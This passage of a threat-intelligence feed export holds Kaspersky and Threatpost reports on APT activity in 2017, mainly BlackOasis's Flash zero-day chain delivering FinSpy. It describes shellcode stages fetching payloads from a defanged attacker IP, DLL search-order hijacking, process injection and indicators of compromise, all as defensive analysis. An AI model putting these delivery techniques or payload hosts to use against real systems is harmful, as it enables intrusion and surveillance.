packages.\n\nLeveraging data from Kaspersky Security Network, we identified two other similar exploit chains used by BlackOasis in June 2015 which were zero days at the time. Those include CVE-2015-5119 and CVE-2016-0984, which were patched in July 2015 and February 2016 respectively. These exploit chains also delivered FinSpy installation packages.\n\nSince the discovery of BlackOasis' exploitation network, we've been tracking this threat actor with the purpose of better understanding their operations and targeting and have seen a couple dozen new attacks. Some lure documents used in these attacks are shown below:\n\n[](<https://securelist.com/files/2017/10/171016-blackoasis-1.png>)[](<https://securelist.com/files/2017/10/171016-blackoasis-2.png>)Decoy documents used in BlackOasis attacks\n\nTo summarize, we have seen BlackOasis utilizing at least five zero days since June 2015:\n\n * CVE-2015-5119 - June 2015\n * CVE-2016-0984 - June 2015\n * CVE-2016-4117 - May 2016\n * CVE-2017-8759 - Sept 2017\n * CVE-2017-11292 - Oct 2017\n\n## Attacks Leveraging CVE-2017-11292\n\nThe attack begins with the delivery of an Office document, presumably in this instance via e-mail. Embedded within the document is an ActiveX object which contains the Flash exploit.\n\n[](<https://securelist.com/files/2017/10/171016-blackoasis-3.png>)[](<https://securelist.com/files/2017/10/171016-blackoasis-4.png>)**Flash object in the .docx file, stored in uncompressed format**\n\nThe Flash object contains an ActionScript which is responsible for extracting the exploit using a custom packer seen in other FinSpy exploits.\n\n[](<https://securelist.com/files/2017/10/171016-blackoasis-5.png>)**Unpacking routine for SWF exploit**\n\nThe exploit is a memory corruption vulnerability that exists in the \"**com.adobe.tvsdk.mediacore.BufferControlParameters**\" class. If the exploit is successful, it will gain arbitrary read / write operations within memory, thus allowing it to execute a second stage shellcode.\n\nThe first stage shellcode contains an interesting NOP sled with alternative instructions, which was most likely designed in such a way to avoid detection by antivirus products looking for large NOP blocks inside flash files:\n\n[](<https://securelist.com/files/2017/10/171016-blackoasis-6.png>)NOP sled composed of 0x90 and 0x91 opcodes\n\nThe main purpose of the initial shellcode is to download second stage shellcode from hxxp://89.45.67[.]107/rss/5uzosoff0u.iaf.\n\n[](<https://securelist.com/files/2017/10/171016-blackoasis-7.png>)**Second stage shellcode**\n\nThe second stage shellcode will then perform the following actions:\n\n 1. Download the final payload (FinSpy) from hxxp://89.45.67[.]107/rss/mo.exe\n 2. Download a lure document to display to the victim from the same IP\n 3. Execute the payload and display the lure document\n\n### Payload - mo.exe\n\nAs mentioned earlier, the \"mo.exe\" payload (MD5: 4a49135d2ecc07085a8b7c5925a36c0a) is the newest version of Gamma International's FinSpy malware, typically sold to nation states and other law enforcement agencies to use in lawful surveillance operations. This newer variant has made it especially difficult for researchers to analyze the malware due to many added anti-analysis techniques, to include a custom packer and virtual machine to execute code.\n\nThe PCODE of the virtual machine is packed with the aplib packer.\n\n[](<https://securelist.com/files/2017/10/171016-blackoasis-8.png>)**Part of packed VM PCODE**\n\nAfter unpacking, the PCODE it will look like the following:\n\n[](<https://securelist.com/files/2017/10/171016-blackoasis-9.png>)**Unpacked PCODE**\n\nAfter unpacking the virtual machine PCODE is then decrypted:\n\n[](<https://securelist.com/files/2017/10/171016-blackoasis-10.png>)**Decrypted VM PCODE**\n\nThe custom virtual machine supports a total of 34 instructions:\n\n[](<https://securelist.com/files/2017/10/171016-blackoasis-11.png>)**Example of parsed PCODE**\n\nIn this example, the \"1b\" instruction is responsible for executing native code that is specified in parameter field.\n\nOnce the payload is successfully executed, it will proceed to copy files to the following locations:\n\n * C:\\ProgramData\\ManagerApp\\AdapterTroubleshooter.exe\n * C:\\ProgramData\\ManagerApp\\15b937.cab\n * C:\\ProgramData\\ManagerApp\\install.cab\n * C:\\ProgramData\\ManagerApp\\msvcr90.dll\n * C:\\ProgramData\\ManagerApp\\d3d9.dll\n\nThe \"AdapterTroubleshooter.exe\" file is a legitimate binary which is leveraged to use the famous DLL search order hijacking technique. The \"d3d9.dll\" file is malicious and is loaded into memory by the legit binary upon execution. Once loaded, the DLL will then inject FinSpy into the Winlogon process.\n\n[](<https://securelist.com/files/2017/10/171016-blackoasis-12.png>)**Part of injected code in winlogon process**\n\nThe payload calls out to three C2 servers for further control and exfiltration of data. We have observed two of them used in the past with other FinSpy payloads. Most recently one of these C2 servers was used together with CVE-2017-8759 in the attacks reported by FireEye in September 2017. These IPs and other previous samples tie closely to the BlackOasis APT cluster of FinSpy activity.\n\n## Targeting and Victims\n\nBlackOasis' interests span a wide gamut of figures involved in Middle Eastern politics and verticals disproportionately relevant to the region. This includes prominent figures in the United Nations, opposition bloggers and activists, and regional news correspondents. During 2016, we observed a heavy interest in Angola, exemplified by lure documents indicating targets with suspected ties to oil, money laundering, and other illicit activities. There is also an interest in international activists and think tanks.\n\nVictims of BlackOasis have been observed in the following countries: Russia, Iraq, Afghanistan, Nigeria, Libya, Jordan, Tunisia, Saudi Arabia, Iran, Netherlands, Bahrain, United Kingdom and Angola.\n\n## Conclusions\n\nWe estimate that the attack on HackingTeam in mid-2015 left a gap on the market for surveillance tools, which is now being filled by other companies. One of these is Gamma International with their FinFisher suite of tools. Although Gamma International itself was hacked by Phineas Fisher in 2014, the breach was not as serious as it was in the case of HackingTeam. Additionally, Gamma had two years to recover from the attack and pick up the pace.\n\nWe believe the number of attacks relying on FinFisher software, supported by zero day exploits such as the ones described here will continue to grow.\n\nWhat does it mean for everyone and how to defend against such attacks, including zero-day exploits?\n\nFor CVE-2017-11292 and other similar vulnerabilities, one can use [the killbit](<https://answers.microsoft.com/en-us/windows/forum/windows_8-update/flashplayer-updates/cd258a3f-cd87-4ea9-bdb6-074d06ad491e?auth=1>) for Flash within their organizations to disable it in any applications that respect it. Unfortunately, doing this system-wide is not easily done, as Flash objects can be loaded in applications that potentially do not follow the killbit. Additionally, this may break any other necessary resources that rely on Flash and of course, it will not protect against exploits for other third party software.\n\nDeploying a multi-layered approach including access policies, anti-virus, network monitoring and whitelisting can help ensure customers are protected against threats such as this. Users of Kaspersky products are protected as well against this threat by one of the following detections:&lt;/p style=\"margin-bottom:0!important\"&gt;\n\n * PDM:Exploit.Win32.Generic\n * HEUR:Exploit.SWF.Generic\n * HEUR:Exploit.MSOffice.Generic\n\nMore information about BlackOasis APT is available to customers of Kaspersky Intelligence Reporting Service. Contact: [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>)\n\n## Acknowledgements\n\nWe would like to thank the Adobe Product Security Incident Response Team (PSIRT) for working with us to identify and patch this vulnerability.\n\n## References\n\n 1. Adobe Bulletin <https://helpx.adobe.com/security/products/flash-player/apsb17-32.html>\n\n## Indicators of compromise\n\n4a49135d2ecc07085a8b7c5925a36c0a \n89.45.67[.]107", "modified": "2017-10-16T14:28:47", "published": "2017-10-16T14:28:47", "id": "SECURELIST:56D279C45B0C4431FBA76FDF2EC365A1", "href": "https://securelist.com/blackoasis-apt-and-new-targeted-attacks-leveraging-zero-day-exploit/82732/", "title": "BlackOasis APT and new targeted attacks leveraging zero-day exploit", "type": "securelist", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-08-29T03:16:10", "bulletinFamily": "blog", "cvelist": ["CVE-2015-5119", "CVE-2016-0984", "CVE-2016-4117", "CVE-2017-0199", "CVE-2017-0261", "CVE-2017-0262", "CVE-2017-0263"], "description": "\n\n## Introduction\n\nSince 2014, Kaspersky Lab's Global Research and Analysis Team (GReAT) has been providing threat intelligence reports to a wide-range of customers worldwide, leading to the delivery of a full and dedicated private reporting service. Prior to the new service offering, GReAT published research online for the general public in an effort to help combat the ever-increasing threat from nation-state and other advanced actors. Since we began offering a threat intelligence service, all deep technical details on advanced campaigns are first pushed to our subscriber base. At the same time, to remain true to our efforts to help make the internet safer, important incidents, such as WannaCry or Petya are covered in both private and public reports.\n\n[](<https://securelist.com/files/2017/08/APT-report-Q2-2017-1.png>)\n\nKaspersky's Private Threat Intelligence Portal (TIP)\n\nIn Q1 of 2017 we published our [first APT Trends report](<https://securelist.com/apt-trends-report-q1-2017/78169/>), highlighting our top research findings over the last few months. We will continue to publish quarterly reports as a representative snapshot of what has been offered in greater detail in our private reports in order to highlight significant events and findings we feel most users should be aware of. If you would like to learn more about our intelligence reports or request more information for a specific report, readers are encouraged to contact: **intelreports@kaspersky.com**.\n\n## Russian-Speaking Actors\n\nThe second quarter of 2017 has seen multiple incidents involving Russian-speaking threat actors. Topping the list of 'attention grabbers' were the Sofacy and Turla threat actors.\n\nMarch and April started off with a bang, with the discovery of three zero-day exploits being used in-the-wild by Sofacy and Turla: two of these targeted Microsoft Office's Encapsulated PostScript (EPS) and the third being a Microsoft Windows Local Privilege Escalation (LPE). Sofacy was discovered utilizing both CVE-2017-0262 (an EPS vulnerability) and CVE-2017-0263 (LPE) over the Easter holiday, targeting a swath of users throughout Europe. Prior to this attack, Turla was also discovered using CVE-2017-0261 (a different EPS vulnerability). Neither actor appeared to deviate from their usual payload repertoire, with Sofacy dropping their typical GAMEFISH payload and Turla utilizing what we refer to as ICEDCOFFEE (a.k.a. Shirime). Targeting for these attacks was also directly within the normal wheelhouse for both actors, focusing mainly on foreign ministries, governments, and other government-affiliated organizations.\n\nGReAT produced additional reports on Sofacy and Turla beyond those mentioned above. In April, we notified customers of two new experimental macro techniques utilized by Sofacy. These techniques, while not particularly sophisticated, caught our attention as they had not been seen before in-the-wild. The first technique involved using the built-in 'certutil' utility in Microsoft Windows to extract a hardcoded payload within a macro. The second technique involved embedding Base64-encoded payloads within the EXIF metadata of the malicious documents. While the targeting for this new set of activity was again fairly standard, we discovered some noteworthy targeting against a French political party member prior to the 2017 elections. Moving into May and June, we wrote two additional reports of interest involving these two actors: the first was an update on the long running \"Mosquito Turla\" campaign showing the usage of fake Adobe Flash installers and continued targeting of foreign Ministries. The other documented yet another update on Sofacy's unique Delphi payload we call 'Zebrocy'.\n\nJune saw the massive outbreak of a piece of malware [dubbed](<https://securelist.com/schroedingers-petya/78870/>) \"ExPetr\". While initial assessments presumed that this was yet another ransomware attack \u00e0 la WannaCry, a deeper assessment by GReAT places the initial intent as constituting an operation destructive in nature. We were also able to confidently identify the initial distribution of the malware, as well as indicate a _low confidence _assessment that the attacks may share traits with the BlackEnergy actors. \n\n[](<https://securelist.com/files/2017/08/APT-report-Q2-2017-2.png>)\n\nBelow is a summary of report titles produced for the Eastern European region only. As stated above, if you would like to learn more about our threat intelligence products or request more information on a specific report, please direct inquiries to **intelreports@kaspersky.com**.\n\n 1. Sofacy Dabbling in New Macro Techniques\n 2. Sofacy Using Two Zero Days in Recent Targeted Attacks - early warning\n 3. Turla EPS Zero Day - early warning\n 4. Mosquito Turla Targets Foreign Affairs Globally\n 5. Update on Zebrocy Activity June 2017\n 6. ExPetr motivation and attribution - Early alert\n 7. BlackBox ATM attacks using SDC bus injection\n\n## English-Speaking Actors\n\nEnglish-speaking actors are always particularly fascinating due to their history of complex tooling and campaigns. Actors like Regin and Project Sauron have proven fascinating examples of new techniques leveraged in long-lasting, hard to catch campaigns and as such make ideal subjects for further research. Not to be outdone, Equation and the Lamberts were the subjects of our most recent investigations.\n\nContinuing our practice of conducting malware paleontology while integrating new discoveries, we published a report on EQUATIONVECTOR, an Equation backdoor first used as early as 2006. This backdoor is a fascinating passive-active shellcode staging implant. It's one of the earliest noted instances of a NObody But US ('NOBUS') backdoor for staging further attacks. Despite its age, the EQUATIONVECTOR backdoor (identified as 'PeddleCheap' in the latest ShadowBrokers disclosures) incorporates many advanced techniques for prolonged stealthy operations in victim networks, allowing the Equation operators to deliver further payloads without arousing suspicion. The report tracks the development of these tools through subsequent iterations year-by-year.\n\nOur tracking of the Lamberts toolkit continues with the publication of the Gray Lambert report in June, the most advanced Lambert known to date. This too is a NOBUS backdoor, a passive implant operating strictly in user-land. The intricate usefulness of Gray Lambert lies in its ability to orchestrate multiple sniffer victims on a network via broadcast, multicast, and unicast commands, allowing the operators to employ surgical precision in networks with many infected machines. The sniffers double as next-stage payload delivery mechanisms for an infected network. A notable feature of the Lambert campaigns is the level of precision with which targets are chosen; Gray Lambert's victimology is primarily focused on strategic verticals in Asia and Middle East. During this investigation, GReAT researchers have also discovered two additional Lambert families (Red Lambert and Brown Lambert) currently under investigation for Q3. Below is a list of report titles for reference:\n\n 1. EQUATIONVECTOR - A Generational Breakdown of the PeddleCheap Multifunctional Backdoor\n 2. The Gray Lambert \u2013 A Leap in Sophistication to User-land NOBUS Passive Implants\n\n## Korean-speaking Actors\n\nOur researchers focusing on attacks with a Korean nexus also had a very busy quarter, producing seven reports on the Lazarus group and WannaCry attacks. Most of the reports on Lazarus directly involved a sub-group we refer to as BlueNoroff. They are the arm that focuses mainly on financial gain, targeting banks, ATMs, and other \"money-makers\". We revealed to customers a previously unknown piece of malware dubbed 'Manuscrypt' used by Lazarus to target not only diplomatic targets in South Korea, but also people using virtual currency and electronic payment sites. Most recently, 'Manuscrypt' has become the primary backdoor used by the BlueNoroff sub-group to target financial institutions.\n\nWannaCry also created quite a stir in the second quarter, with our analysts producing three reports and multiple blog posts on this emerging threat. What proved most interesting to us, was the probable linkage to Lazarus group as the source of the attacks, as well as the origins of the malware. GReAT researchers were able to trace back some of its earliest usage and show that before the 'EternalBlue' exploit was added to version 2, WannaCry v1 was used in spearphishing attacks months prior. Here is a listing of our reports from Q2 on actors with a Korean nexus:\n\n 1. Manuscrypt - malware family distributed by Lazarus\n 2. Lazarus actor targets carders\n 3. Lazarus-linked ATM Malware On the Loose In South Korea\n 4. Lazarus targets electronic currency operators\n 5. WannaCry - major ransomware attack hitting businesses worldwide - early alert\n 6. WannaCry possibly tied to the Lazarus APT Group\n 7. The First WannaCry Spearphish and Module Distribution\n\n## Middle Eastern Actors\n\nWhile there wasn't much high-end activity involving Middle Eastern actors, we did produce two reports revolving around the use of a zero-day exploit (CVE-2017-0199). The most notable involved an actor we refer to as BlackOasis and their usage of the exploit in-the-wild prior to its discovery. We have previously reported on BlackOasis using other zero-days in the past; CVE-2016-4117 in May 2016, CVE-2016-0984 in June 2015, and CVE-2015-5119 in June 2015. It is believed that BlackOasis is a customer of Gamma Group and utilizes the popular 'lawful surveillance' kit FinSpy. Other than the usage of the exploit, this report was significant because it also showed one of the earliest known uses of a new version of FinSpy, which is still being analyzed by our researchers.\n\nAfter the discovery of CVE-2017-0199, a plethora of threat actors also began to leverage this exploit in their attacks. We reported to customers on the usage of this exploit by a well-known Middle Eastern actor dubbed 'OilRig'. OilRig has actively targeted many organizations in Israel with the exploit via spearphishes appearing to originate from well-known doctors within Ben Gurion University. While their execution was less than stellar, it highlighted the widespread usage of this exploit shortly after its discovery.\n\n 1. OilRig exploiting CVE-2017-0199 in new campaign\n 2. BlackOasis using Ole2Link zero day exploit in the wild\n\n## Chinese-Speaking Actors\n\nOn the Chinese speaking front, we felt it necessary to produce two reports to our customers. While Chinese speaking actors are active on a daily basis, not much has changed and we prefer to avoid producing reports on 'yet another instance of APTxx' for the sake of padding our numbers. Instead we try to focus on new and exciting campaigns that warrant special attention.\n\nOne of those reports detailed a new finding regarding a fileless version of the well-known 'HiKit' malware dubbed 'Hias'. We have reported on Hias in the past, and one of our researchers was finally able to discover the persistence mechanism used, which also allowed us to tie the activity to an actor we call 'CloudComputating'.\n\nAnother report detailed a new campaign we referred to as 'IndigoZebra'. This campaign was targeting former Soviet Republics with a wide swath of malware including Meterpreter, Poison Ivy, xDown, and a previously unknown malware called 'xCaon'. This campaign shares ties with other well-known Chinese-speaking actors, but no definitive attribution has been made at this time.\n\n 1. Updated technical analysis of Hias RAT\n 2. IndigoZebra - Intelligence preparation to high-level summits in Middle Asia\n\n## Best of the rest\n\nSometimes we find new and exciting campaigns or entirely new threat actors to report to our subscribers without being able to make an immediate or definitive determination on regional provenance. Several reports fell into this category in the last quarter. ChasingAdder is a report describing a new persistence technique that hijacked a legitimate WMI DLL for the purposes of loading a malicious payload. This activity targeted high-profile diplomatic, military, and research organizations beginning in the fall of 2016, but to date we have not been able to pinpoint the specific actor responsible.\n\nDemsty is a new piece of MacOS malware that is targeting University researchers in Hong Kong, among others. At the time of writing, we have a low confidence assessment that the campaign was conducted by Chinese-speaking actors, and thus categorize this as 'Unknown' until greater evidence comes to light.\n\nDuring Q2, the mischievous ShadowBrokers also continued their regular activities dumping multiple tools and documentation allegedly stolen from Equation Group. In April, the ShadowBrokers released another dump of information detailing the alleged targeting of SWIFT service bureaus and other banks by Equation Group. Since some of our customers are financial entities, we found it necessary to evaluate the data and provide an expert's opinion on the validity of the dump.\n\nReports in the 'unknown' category:\n\n 1. ShadowBrokers' Lost in translation leak - SWIFT attacks analysis\n 2. ChasingAdder - WMI DLL Hijacking Trojan Targeting High Profile Victims\n 3. University Researchers Located in Hong Kong Targeted with Demsty\n\n## Predictions\n\nBased on the trends we've seen over the last three months, as well as foreseeable geopolitical events, we have listed a few predictions for the upcoming quarter (Q3). As always, this isn't an exact science and some cases won't come to fruition. Analyzing current and future events and combining those with the motivations of known active actors can help organizations prepare for likely forthcoming activity:\n\n 1. Misinformation campaigns will remain a threat to countries with upcoming elections, specifically Germany and Norway, as they have been previous targets for Eastern European based actors.\n 2. 'Lawful Surveillance' tools will continue to be utilized by governments that don't have well-established Cyber Operations capabilities, mainly based out of the Middle East. Companies such as Gamma Group, Hacking Team, and NSO will continue to offer new zero-day exploits to those customers. As prices increase and exchanges thrive, new organizations and marketplaces will continue popping up.\n 3. Destructive malware disguised as ransomware will continue to be a problem. In the last quarter we've seen two instances of this, and with the continued release of tools / exploits from dumps like Vault7 and ShadowBrokers, this is going to be a new alarming trend to deal with.\n 4. In China, the past months have been marked by the dwindling economic growth, rising tensions with North Korea and the US, and increased exchanges between South Korean / Japanese / American organizations. In addition to these, the 19th Party Congress is set to be held in the fall of 2017 and according to multiple public predictions, it is likely that some major changes will happen in the leadership. It's possible that these events will have wide regional influences that could affect the way that threat actors operate in Asia, both in terms of targeting and TTPs.\n 5. Targeting energy-related companies and organizations will be on the rise. Countries such as Norway may be a top target moving forward given their control on oil and gas in the region in the buildup to an election. Saudi Arabia will also top the charts for potential targeting as they have in years past.\n 6. Lower-tier threat actors continue to increase cyber-espionage efforts and capabilities both in complexity and size. Expect more activity with varied technical capabilities coming from lesser known or previously unseen actors.\n\n## How to keep yourself protected\n\nOne of the biggest problems when it comes to leveraging threat intelligence is judging the quality of the data and how it can be used for defense. For instance, we may observe an increase in the number of fileless attacks or attacks in which all IOCs are unique or specific per victim. In such situations, having not only host-based IOCs, but also network IOCs and Yara rules that can help identify malware in all cases is very important.\n\nAnother problem comes from the fact that many threat intelligence providers have a limited world view and their data covers only a small set of threats. It's easy for an enterprise to fall into the trap of thinking that 'actor X' is not something they need to worry because their focus has been only certain countries or certain industry sectors; only to discover later that their ignorance left them blind to those attacks.\n\nAs shown by many incidents, but especially by WannaCry and ExPetr's EternalBlue-based spreading subroutines, vulnerabilities remain a key approach to infecting systems. Therefore timely patching is of utmost importance \u2013 which, being one of the most tedious IT maintenance tasks, works much better with good automation. Kaspersky Endpoint Security for Business Advanced and Kaspersky Total Security include Vulnerability &amp; Patch management components, offering convenient tools for making patching much easier, and much less time-consuming for IT staff.\n\nGiven the above, it is highly recommended that prevention (such as endpoint protection) along with advanced detection capabilities, such as a solution that can detect all types of anomalies and scrutinize suspicious files at a deeper level, be present on users' systems. The Kaspersky Anti Targeted Attack solution (KATA) matches events coming from different infrastructure levels, discerns anomalies and aggregates them into incidents, while also studying related artifacts in a safe environment of a sandbox. As with most Kaspersky products, KATA is powered by HuMachine Intelligence, which is backed by on premise and in lab-running machine learning processes coupled with real-time analyst expertise and our understanding of threat intelligence big data.\n\nThe best way to prevent attackers from finding and leveraging security holes, is to eliminate the holes altogether, including those involving improper system configurations or errors in proprietary applications. For this, Kaspersky Penetration Testing and Application Security Assessment services can become a convenient and highly effective solution, providing not only data on found vulnerabilities, but also advising on how to fix it, further strengthening corporate security.", "modified": "2017-08-08T14:00:40", "published": "2017-08-08T14:00:40", "href": "https://securelist.com/apt-trends-report-q2-2017/79332/", "id": "SECURELIST:75F0B75D28318C525992E42495D8C5EE", "title": "APT Trends report Q2 2017", "type": "securelist", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "threatpost": [{"lastseen": "2018-10-06T22:53:18", "bulletinFamily": "info", "cvelist": ["CVE-2015-5119", "CVE-2016-0984", "CVE-2016-4117", "CVE-2017-0199", "CVE-2017-0261"], "description": "Attackers behind advanced persistent threat campaigns have kept busy over the past several months, adding new ways to bypass detection, crafting new payloads to drop, and identifying new zero days and backdoors to help them infect users and maintain persistence on machines.\n\nJuan Andres Guerrero-Saade and Brian Bartholomew, members of Kaspersky Lab\u2019s [Global Research and Analysis Team,](<https://securelist.com/apt-trends-report-q2-2017/79332/>) described some of tactics the researchers have seen in Q2 2017 in [a webinar](<https://www.brighttalk.com/webcast/15591/273279>) Tuesday morning. The company used the webinar and [the quarterly report it was based on](<https://securelist.com/apt-trends-report-q2-2017/79332/>) to help pull back the veil on threats previously covered by its private intelligence reporting service.\n\nA chunk of the presentation was spent recapping tweaks recently made by Russian-speaking groups Sofacy and Turla.\n\nSofacy, the group implicated by a December [DHS report](<https://threatpost.com/fbi-dhs-report-links-fancy-bear-to-election-hacks/122802/>) to election hacks, began using two new macro techniques in April. One abused Windows\u2019 certutil utility to extract payloads\u2014the first time the researchers had seen that technique used\u2014another embedded payloads in the EXIF metadata of malicious Office documents.\n\n\u201cAfter we started digging into this we found that they were actually using this technique dating back to December 2016,\u201d Bartholomew said, adding that what made the techniques interesting is that they were used to target French political party members prior to the French election on April 23 and May 7.\n\nIn June, the researchers noticed that Sofacy had updated a payload, written in Delphi, called Zebrocy. The new iteration, version 5.1 of Zebrocy, implemented new encryption keys and minor string obfuscations, something which helps it bypass detection capabilities, Bartholomew said.\n\nBartholomew said the researchers were able to tie Zebrocy to Sofacy in mid-2016.\n\n\u201cThere were some infrastructure ties there,\u201d Bartholomew said, \u201cThere was also another payload called Delphocy that was also written in Delphi. In late 2015 we started seeing Delphi payloads pop up from this group, which we hadn\u2019t seen before. We don\u2019t know why that\u2019s the case, it could be that they hired a developer who just refuses to write anything but Delphi. Either way, once Zebrocy was discovered, it was found in parallel to another Sofacy infection, once we started digging into it there was a little bit of shared code in the Delphi\u2014compared to the other Delphocy payload\u2014and ties to the infrastructure to Sofacy.\u201d\n\nEarlier this spring researchers said they were able to make a potential link between Turla, the APT [linked to Moonlight Maze at SAS](<http://the APT linked to Moonlight Maze at SAS earlier this year>) earlier this year, and Sofacy. Like Sofacy was doing around the same time, Turla was spotted using an EPS zero day (CVE-2017-0261) to target foreign ministries and governments.\n\n\u201cWhat\u2019s interesting about that is that it may actually indicate a shared supply chain between Turla and Sofacy,\u201d Bartholomew said.\n\nBartholomew also took time on Tuesday to discuss BlackOasis, a Middle Eastern-speaking group that\u2019s believed to be a client of Gamma Group, the UK-based firm that specializes in surveillance and monitoring equipment, such as FinFisher.\n\nHe claims the group, which he\u2019s spent the better chunk of a year and a half researching, has been spotted using several zero days in the past, including CVE-2016-4117, CVE-2016-0984, and CVE-2015-5119. Bartholomew says that what makes it interesting is that the group was the first seen using CVE-2017-0199, an OLE2Link zero-day, in the wild before it was detected. The exploit\u2019s end payload, he adds, is a new variant of FinSpy heavily fortified to prevent analysis by researchers.\n\n\u201cWe\u2019re currently trying to look into that, write some decryptors for it and will probably write another report on that in the next couple of months,\u201d Bartholomew said.\n\nCiting their technical sophistication and development, Guerrero-Saade was eager to discuss a crop of English speaking APT actors, including those behind an Equation Group backdoor, EQUATIONVECTOR. While the backdoor has been around since 2006, Guerrero-Saade said what makes it interesting is the fact that it\u2019s the first example of a NOBUS\u2014NObody But US backdoor\u2014they\u2019ve seen in the wild. The backdoor, a passive and active staging backdoor, could be used to execute shellcode payloads, according to the researcher.\n\nAnother backdoor, Gray Lambert\u2014an extension of the [Lamberts APT](<https://threatpost.com/tools-used-by-lamberts-apt-found-in-vault-7-dumps/124900/>) group\u2014is much more modern implementation, Guerrero-Saade said. It waits, sleeps, and sniffs the network until it\u2019s ready to be used.\n\n\u201cWhat makes this NOBUS backdoor particularly interesting is that it provides attackers with a sort of surgical precision over a network of multiple infected machines,\u201d Guerrero-Saade said. \u201cWith Gray Lambert installed on these machines [attackers] can essentially decide how they\u2019re going to space their payloads, their commands and attacks.\u201d\n\nThe researchers suggest that users should expect more of the same tactics, techniques, and procedures (TTPs) from APT groups going forward. It\u2019s likely countries that have upcoming elections, Germany and Norway for example, will become targets for misinformation campaigns like the one mounted by the Sofacy group. Controversial lawful surveillance tools, like those peddled by the Gamma Group to BlackOasis and those sold by the [NSO Group to the Mexican government](<https://threatpost.com/mexican-journalists-lawyers-focus-of-government-spyware/126367/>), will remain popular as well, Guerrero-Saade and Bartholomew said.\n\nThe trend of destructive malware disguised as ransomware will likely continue as well, Guerrero-Saade says, but admits it\u2019s a curious question whether or not the technique will ever be embraced by cybercriminals.\n\n\u201cWe\u2019ve been talking about incompetent people entering the ransomware space for a quite some time now,\u201d Guerrero-Saade said, \u201cWe\u2019re going to see people who are poor coders and won\u2019t even bother to buy an already prepared kit, just essentially trying to leverage something that deletes all the files, or doesn\u2019t do anything but tries to get money out of na\u00efve or unsuspecting victims. The notion of wipers as ransomware is quite different. It\u2019s an interesting phenomenon.\u201d\n\n\u201cSabotage attacks and wiper attacks are a strange occurrence, they don\u2019t happen that often. I think over the past 10 years we\u2019ve looked at 10 cases tops. They\u2019re very rare components. For the most part I think it has to do with the level of access that you\u2019re burning whenever you use them,\u201d Guerrero-Saade said, \u201cIf you\u2019re a cyberespionage actor, if you have access to a network at that point, a Sony or Saudi Aramco, where you can target thousands of machines, the idea of burning that loudly, raising the security profile of the organization as a whole and creating public fallout is extremely costly. It\u2019s a strange circumstance where the calculus pays off.\u201d\n\nWhile it may not be a popular technique for cybercriminals on a lower level, Guerrero-Saade said, it\u2019s not out of the realm of possibility for APT gangs to continue to use the vector to create havoc.\n\n\u201cLet\u2019s say we have all the means for a sabotage attack and we want to disguise it as ransomware or as something potentially treatable, it\u2019s not necessarily that different from what the Lazarus Group did with Sony, or some other South Korean targets, where first they asked for money and then dumped data anyways. It\u2019s an evolution that\u2019s particularly troubling,\u201d Guerrero-Saade said.\n", "modified": "2017-08-22T12:54:04", "published": "2017-08-08T16:34:08", "id": "THREATPOST:BAC3CD99B74F1D6CD22A123ED632AA3F", "href": "https://threatpost.com/updates-to-sofacy-turla-highlight-2017-q2-apt-activity/127297/", "type": "threatpost", "title": "Updates to Sofacy, Turla Highlight 2017 Q2 APT Activity", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}